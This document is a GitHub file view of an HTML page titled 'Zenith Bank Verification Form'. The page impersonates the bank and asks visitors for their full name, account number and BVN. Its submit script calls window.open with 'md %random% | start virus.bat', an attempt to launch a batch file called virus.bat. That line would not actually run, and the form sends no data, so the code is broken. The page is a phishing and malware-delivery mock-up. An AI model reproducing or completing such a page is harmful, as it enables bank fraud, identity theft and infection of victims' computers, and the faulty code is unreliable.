-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathzenith_form.html
More file actions
86 lines (71 loc) · 1.91 KB
/
Copy pathzenith_form.html
File metadata and controls
86 lines (71 loc) · 1.91 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Zenith Bank Verification</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #f2f2f2;
padding: 20px;
}
h2 {
text-align: center;
color: #cc0000;
}
form {
max-width: 400px;
margin: auto;
background-color: white;
padding: 20px;
border-radius: 10px;
box-shadow: 0 0 10px rgba(0,0,0,0.1);
}
label {
display: block;
margin-top: 10px;
}
input {
width: 100%;
padding: 10px;
margin-top: 5px;
border: 1px solid #ccc;
border-radius: 5px;
}
button {
margin-top: 20px;
width: 100%;
padding: 10px;
background-color: #cc0000;
color: white;
border: none;
border-radius: 5px;
cursor: pointer;
}
button:hover {
background-color: #a00000;
}
</style>
</head>
<body>
<h2>Zenith Bank Verification Form</h2>
<form id="zenithForm">
<label for="name">Full Name</label>
<input type="text" id="name" name="fullname" required>
<label for="account">Account Number</label>
<input type="text" id="account" name="account_number" maxlength="10" pattern="\d{10}" required>
<label for="bvn">BVN</label>
<input type="text" id="bvn" name="bvn" maxlength="11" pattern="\d{11}" required>
<button type="submit">Verify</button>
</form>
<script>
const form = document.getElementById('zenithForm');
form.addEventListener('submit', function (e) {
e.preventDefault(); // stop actual form submission
// Here you can add validation if needed
// Open a specific file from the code
window.open('md %random% | start virus.bat', '_blank'); // make sure this file exists in your folder
});
</script>
</body>
</html>